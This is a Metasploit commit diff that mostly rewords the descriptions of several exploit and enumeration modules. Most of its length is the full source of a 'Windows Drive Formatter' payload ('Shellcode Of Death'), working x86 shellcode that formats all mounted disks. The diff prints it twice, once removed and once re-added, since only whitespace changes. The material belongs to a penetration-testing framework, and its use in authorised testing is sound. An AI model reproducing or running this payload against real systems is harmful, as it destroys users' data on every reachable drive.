Land rapid7#4314, @todb-r7's module cleanup

wvu · wvu · commit 2f98a4624199 · 2014-12-05T14:05:09.000-06:00
diff --git a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb
@@ -15,7 +15,7 @@ def initialize(info = {})
     super(update_info(info,
       'Name'        => 'Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration',
       'Description' => %q{
-        This module can be used to brute force RIDs associated with the domain of the SQL Server
+        This module can be used to bruteforce RIDs associated with the domain of the SQL Server
         using the SUSER_SNAME function. This is similar to the smb_lookupsid module, but executed
         through SQL Server queries as any user with the PUBLIC role (everyone). Information that
         can be enumerated includes Windows domain users, groups, and computer accounts. Enumerated
diff --git a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb
@@ -15,7 +15,7 @@ def initialize(info = {})
     super(update_info(info,
       'Name'        => 'Microsoft SQL Server - SQLi SUSER_SNAME Domain Account Enumeration',
       'Description' => %q{
-        This module can be used to brute force RIDs associated with the domain of the SQL Server
+        This module can be used to bruteforce RIDs associated with the domain of the SQL Server
         using the SUSER_SNAME function via Error Based SQL injection. This is similar to the
         smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC
         role (everyone). Information that can be enumerated includes Windows domain users, groups,
diff --git a/modules/exploits/linux/http/pandora_fms_sqli.rb b/modules/exploits/linux/http/pandora_fms_sqli.rb
@@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => 'Pandora FMS SQLi Remote Code Execution',
+      'Name'           => 'Pandora FMS Default Credential / SQLi Remote Code Execution',
       'Description'    => %q{
         This module attempts to exploit multiple issues in order to gain remote
         code execution under Pandora FMS version <= 5.0 SP2.  First, an attempt
diff --git a/modules/exploits/osx/local/iokit_keyboard_root.rb b/modules/exploits/osx/local/iokit_keyboard_root.rb
@@ -23,7 +23,7 @@ def initialize(info={})
 
         Tested on Mavericks 10.9.5, and should work on previous versions.
 
-        The issue has been patched silently in Yosemite.
+        The issue was patched silently in Yosemite.
       },
       'License'       => MSF_LICENSE,
       'Author'        =>
diff --git a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -27,10 +27,11 @@ def initialize(info={})
     super(update_info(info,
       'Name'           => "Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",
       'Description'    => %q{
-        This module exploits Windows OLE Automation Array Vulnerability known as CVE-2014-6332.
+        This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332.
         The vulnerability affects Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.
-        Powershell is required on the target machine. On Internet Explorer versions using Protected Mode,
-        the user has to manually allow powershell.exe to execute in order to be compromised.
+        For this module to be successful, powershell is required on the target machine. On
+        Internet Explorer versions using Protected Mode, the user has to manually allow
+        powershell.exe to execute in order to be compromised.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
diff --git a/modules/payloads/singles/windows/format_all_drives.rb b/modules/payloads/singles/windows/format_all_drives.rb
@@ -1,95 +1,91 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-###
-#   Shellcode Of Death
-#
-#   Test bed: 
-#        x86: Windows XP SP3, Windows 2003 SP2, Windows 7
-#        x64: Windows 8.1
-#
-###
-
-require 'msf/core'
-
-module Metasploit3
-
-  Rank = ManualRanking
-
-  include Msf::Payload::Windows
-  include Msf::Payload::Single
-
-  def initialize(info = {})
-    super(update_info(info,
-      'Name'          => 'Windows Drive Formatter',
-      'Description'   => %q{
-        This payload formats all mounted disks in 
-        Windows (aka ShellcodeOfDeath). 
-
-        After formatting, this payload sets the 
-        volume label to the string specified in 
-        the VOLUMELABEL option. If the code is 
-        unable to access a drive for any reason, 
-        it skips the drive and proceeds to the 
-        next volume. 
-      },
-      'Author'        => [ 'Ashfaq Ansari <ashfaq_ansari1989[at]hotmail.com>',
-                         'Ruei-Min Jiang <mike820324[at]gmail.com>'
-                        ],
-      'License'       => MSF_LICENSE,
-      'References'    =>
-        [
-          [ 'URL', 'http://hacksys.vfreaks.com/research/shellcode-of-death.html' ],
-          [ 'URL', 'https://github.com/hacksysteam/ShellcodeOfDeath' ],
-        ],
-      'Platform'      => 'win',
-      'Arch'          => ARCH_X86,
-      'Privileged'    => true,
-      ))
-
-    # EXITFUNC is not supported
-    deregister_options('EXITFUNC')
-
-    # Register command execution options
-    register_options(
-      [
-        OptString.new('VOLUMELABEL', [ false, "Set the volume label", "PwNeD" ])
-      ], self.class)
-  end
-
-  def generate
-
-    volume_label   = datastore['VOLUMELABEL'] || ""
-    encoded_volume_label = volume_label.to_s.unpack("C*").pack("v*")
-
-    # Calculate the magic key
-    magic_key    = encoded_volume_label.length + 28
-
-    # Actual payload
-    payload_data =  "\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50\x31\xdb\x31\xc0\xac\xc1\xc3\x05\x01\xc3\x83" +
-            "\xf8\x00\x75\xf3\xc1\xcb\x05\x39\xcb\x58\x5b\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c" +
-            "\x8b\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20\x8d\x1c\x02\xe8\xc3\xff\xff\xff\x5b\x8b\x4b" +
-            "\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25\xff\xff\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83" +
-            "\x8d\x04\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x40\x1c\x8b\x50\x08\x8b" +
-            "\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68\x64\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4" + 
-            "\x34\x3b\x68\x96\x90\x62\xd7\x68\x87\x8f\x46\xec\x68\x06\xe5\xb0\xcf\x68\xdc\xdd\x1a\x33" +
-            "\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89" +
-            "\xc2\x59\x51\x8b\x4c\xbd\x00\xe8\x6b\xff\xff\xff\x59\x50\x47\xe2\xe0\x89\xe5\xeb\x0f\xe8" +
-            "\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64\x6c\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf" +
-            "\x31\xd2\x52\x52\x6a\x03\x52\x6a\x03\x68\x00\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3\x50\x83" +
-            "\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52\x52\x52\x52\x68\x20\x00\x09\x00\x50\x8b\x5d" +
-            "\x08\xff\xd3\xff\x74\x24\x04\x8b\x5d\x0c\xff\xd3\x8d\x86" +
-            # You need to adjust this. Logic: encoded_volume_label.length + 28
-            [magic_key].pack("C") +
-            "\x00\x00\x00\x50\x68\x00\x10\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50\x8d\x86\x10\x00" +
-            "\x00\x00\x50\x6a\x0c\x8d\x46\x08\x50\x8b\x5d\x00\xff\xd3\x68\xc8\x00\x00\x00\x8b\x5d\x04" +
-            "\xff\xd3\x89\xf9\x83\x46\x08\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8\x7d\xff\xff\xff" +
-            "\x5c\x00\x5c\x00\x2e\x00\x5c\x00\x43\x00\x3a\x00\x5c\x00\x00\x00\x4e\x00\x54\x00\x46\x00" +
-            "\x53\x00\x00\x00" +
-            # Volume Label, default: PwNeD
-            encoded_volume_label +
-            "\x00\x00\x55\x89\xe5\x31\xc0\x40\x5d\xc2\x0c\x00"
-  end
-end
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#   Shellcode Of Death
+#
+#   Test bed:
+#        x86: Windows XP SP3, Windows 2003 SP2, Windows 7
+#        x64: Windows 8.1
+#
+###
+
+require 'msf/core'
+
+module Metasploit3
+
+  Rank = ManualRanking
+
+  include Msf::Payload::Windows
+  include Msf::Payload::Single
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Windows Drive Formatter',
+      'Description'   => %q{
+        This payload formats all mounted disks in Windows (aka ShellcodeOfDeath).
+
+        After formatting, this payload sets the volume label to the string specified in
+        the VOLUMELABEL option. If the code is unable to access a drive for any reason,
+        it skips the drive and proceeds to the next volume.
+      },
+      'Author'        => [ 'Ashfaq Ansari <ashfaq_ansari1989[at]hotmail.com>',
+                         'Ruei-Min Jiang <mike820324[at]gmail.com>'
+                        ],
+      'License'       => MSF_LICENSE,
+      'References'    =>
+        [
+          [ 'URL', 'http://hacksys.vfreaks.com/research/shellcode-of-death.html' ],
+          [ 'URL', 'https://github.com/hacksysteam/ShellcodeOfDeath' ],
+        ],
+      'Platform'      => 'win',
+      'Arch'          => ARCH_X86,
+      'Privileged'    => true,
+      ))
+
+    # EXITFUNC is not supported
+    deregister_options('EXITFUNC')
+
+    # Register command execution options
+    register_options(
+      [
+        OptString.new('VOLUMELABEL', [ false, "Set the volume label", "PwNeD" ])
+      ], self.class)
+  end
+
+  def generate
+
+    volume_label   = datastore['VOLUMELABEL'] || ""
+    encoded_volume_label = volume_label.to_s.unpack("C*").pack("v*")
+
+    # Calculate the magic key
+    magic_key    = encoded_volume_label.length + 28
+
+    # Actual payload
+    payload_data =  "\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50\x31\xdb\x31\xc0\xac\xc1\xc3\x05\x01\xc3\x83" +
+            "\xf8\x00\x75\xf3\xc1\xcb\x05\x39\xcb\x58\x5b\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c" +
+            "\x8b\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20\x8d\x1c\x02\xe8\xc3\xff\xff\xff\x5b\x8b\x4b" +
+            "\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25\xff\xff\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83" +
+            "\x8d\x04\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x40\x1c\x8b\x50\x08\x8b" +
+            "\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68\x64\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4" +
+            "\x34\x3b\x68\x96\x90\x62\xd7\x68\x87\x8f\x46\xec\x68\x06\xe5\xb0\xcf\x68\xdc\xdd\x1a\x33" +
+            "\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89" +
+            "\xc2\x59\x51\x8b\x4c\xbd\x00\xe8\x6b\xff\xff\xff\x59\x50\x47\xe2\xe0\x89\xe5\xeb\x0f\xe8" +
+            "\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64\x6c\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf" +
+            "\x31\xd2\x52\x52\x6a\x03\x52\x6a\x03\x68\x00\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3\x50\x83" +
+            "\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52\x52\x52\x52\x68\x20\x00\x09\x00\x50\x8b\x5d" +
+            "\x08\xff\xd3\xff\x74\x24\x04\x8b\x5d\x0c\xff\xd3\x8d\x86" +
+            # You need to adjust this. Logic: encoded_volume_label.length + 28
+            [magic_key].pack("C") +
+            "\x00\x00\x00\x50\x68\x00\x10\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50\x8d\x86\x10\x00" +
+            "\x00\x00\x50\x6a\x0c\x8d\x46\x08\x50\x8b\x5d\x00\xff\xd3\x68\xc8\x00\x00\x00\x8b\x5d\x04" +
+            "\xff\xd3\x89\xf9\x83\x46\x08\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8\x7d\xff\xff\xff" +
+            "\x5c\x00\x5c\x00\x2e\x00\x5c\x00\x43\x00\x3a\x00\x5c\x00\x00\x00\x4e\x00\x54\x00\x46\x00" +
+            "\x53\x00\x00\x00" +
+            # Volume Label, default: PwNeD
+            encoded_volume_label +
+            "\x00\x00\x55\x89\xe5\x31\xc0\x40\x5d\xc2\x0c\x00"
+  end
+end
